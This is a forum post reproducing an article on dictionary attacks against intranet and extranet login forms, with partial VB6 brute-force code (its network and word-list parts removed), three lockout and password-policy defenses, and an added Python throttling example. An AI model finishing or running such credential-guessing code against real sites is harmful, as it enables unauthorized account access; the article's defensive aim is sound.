Extranet/Intranet Cracker – A Dictionary Attack.

Started by ben2ong2, October 07, 2006, 04:43:22 PM


ben2ong2

I wrote this Cracker to gain entry into a client’s Intranet, and did so in 2 minutes with a basic dictionary of 100 words (cat,dog,admin,…). The purpose of this article is to stun you into taking the necessary steps to protect your site. I was prompted to write this article because of posted literature exposing You are not allowed to view links. Register or Login susceptibility. If you are looking for a Cracker engine, it is not here. I have removed the communication and word library elements, but the architecture and code are in place so that it is easy to see how entry is gained to your site.

Despite the abundance of security publications, advertisements and television hype describing most unauthorized entry to computers as gained via network vulnerabilities, system flaws, bugs, loopholes, and buffer overflows, the weakest point of any network is the user. Specifically, the user uses a UID of ‘admin’ and PW of ‘password’ or other common words. Truly, this is incredibly widespread.

The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate of sending UID/PW combinations, and 3) the ‘Commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h).

In each element below, the defending server is an MS IIS Server; however, the concept arguments can be applied to any server.

   1. To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session, automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times out, the system resets and the user can again gain access with the correct UID/PW.
   2. The ‘rate’ of sending UID/PW addresses the number of attempts to log in within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead as it would take ~ 6.8 YEARS to use the smallest 100-word library.
   3. ‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compare them against a word library. If the submitted PW is in the library, then a different one is requested.

The VB6 code below is compiled into a simple .exe that takes parameters such as site address, UID and PW. Using a comma-delimited .txt file of common words, the program sets a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine if access was granted. When the program is finished, a MsgBox is displayed with the UID/PW that were granted access.

Public Function getDictionary(ByVal strURL As String, _
        ByVal strMethod As String, ByVal strForm As String, _
        ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String
    Dim mHTTP As Object, aryDictionary() As String
    Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String

    ApplicationPath = App.Path & "\"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1) '1 = ForReading
    S = S & TextStream.ReadAll
    TextStream.Close
    DoEvents

    getDictionary = getDictionaryAccess(strForm, UidLimitLen, mHTTP, strMatchNoEntry, aryDictionary)
End Function

Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer, _
        ByRef mHTTP As Object, ByVal strMatchNoEntry As String, _
        ByRef aryDictionary() As String) As String
    'Returns ";" delimited string of params
    'assumes two params of username and password, the exact name value are passed in
    'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999"
    'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary
    'the random attack does the 1 to 3 uid and pw matrix
    Dim aryParams As Variant, strTemp As String, aryTemp() As String
    Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String

    iSections = iSections + 1 'iSections allows control of word length

    On Error Resume Next
    For uid = 0 To UBound(aryDictionary)
        For pw = 0 To UBound(aryDictionary)
            If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then
                getDictionaryAccess = aryParams(0) & "=" & aryDictionary(uid) & "&" & _
                    aryParams(1) & "=" & aryDictionary(pw)

                'mHTTP engine method call (communication element removed by the author)
                Call IMWaiting(mHTTP)
                'strResponse = mHTTP engine data retrieval (communication element removed by the author)
                Call IMWaiting(mHTTP)

                strResponse = Replace(strResponse, Chr(13), ";")
                If (strResponse <> "") Then
                    If Not CBool(InStr(CStr(strResponse), CStr(strMatchNoEntry)) > 0) Then
                        'strSomeAccessPoints has the params that GRANTED ACCESS
                        strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";"
                    End If
                End If
                strResponse = ""
                DoEvents
            End If
        Next
    Next
    On Error GoTo 0

    getDictionaryAccess = strSomeAccessPoints
End Function

Please notice that this is very standard programming; protect yourself!


Article By, Matthew P. Burnett.
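
An added example, not part of the original article or post: defensive items 2 and 3 from the list above in Python, with the failure counter kept server-side and keyed on the submitted user name instead of the Session, because a client that discards its cookie starts a fresh Session. The class and function names, the "admin" key and the sample word list are assumptions made for the illustration.

```python
import time

MAX_FAILURES = 3        # article: three incorrect attempts
LOCKOUT_SECONDS = 3600  # article: refuse logins for the next hour


class LoginThrottle:
    """Server-side failure counter, keyed on the submitted user name."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._state = {}  # key -> (failures, locked_until)

    def attempt(self, key, credentials_ok):
        now = self._clock()
        failures, locked_until = self._state.get(key, (0, None))
        if locked_until is not None:
            if now < locked_until:
                return "locked"  # refused even when the password is right
            failures, locked_until = 0, None  # lockout expired, start over
        if credentials_ok:
            self._state.pop(key, None)
            return "granted"
        failures += 1
        if failures >= MAX_FAILURES:
            locked_until = now + LOCKOUT_SECONDS
        self._state[key] = (failures, locked_until)
        return "denied"


def load_word_library(text):
    """Parse a comma-delimited word list into a lowercase set."""
    return {w.strip().lower() for w in text.split(",") if w.strip()}


def password_allowed(candidate, library):
    """Item 3: a new password found in the word library is refused."""
    return candidate.strip().lower() not in library


def replay_guesses(guess_count, seconds_between, correct_index):
    """Replay evenly spaced logins on a fake clock; return each outcome."""
    t = [0.0]
    throttle = LoginThrottle(clock=lambda: t[0])
    outcomes = []
    for i in range(guess_count):
        outcomes.append(throttle.attempt("admin", i == correct_index))
        t[0] += seconds_between
    return outcomes
```

Replaying ten logins one second apart with the correct password in sixth position shows the effect: three are evaluated and denied, and the remaining seven, including the correct one, are refused as locked.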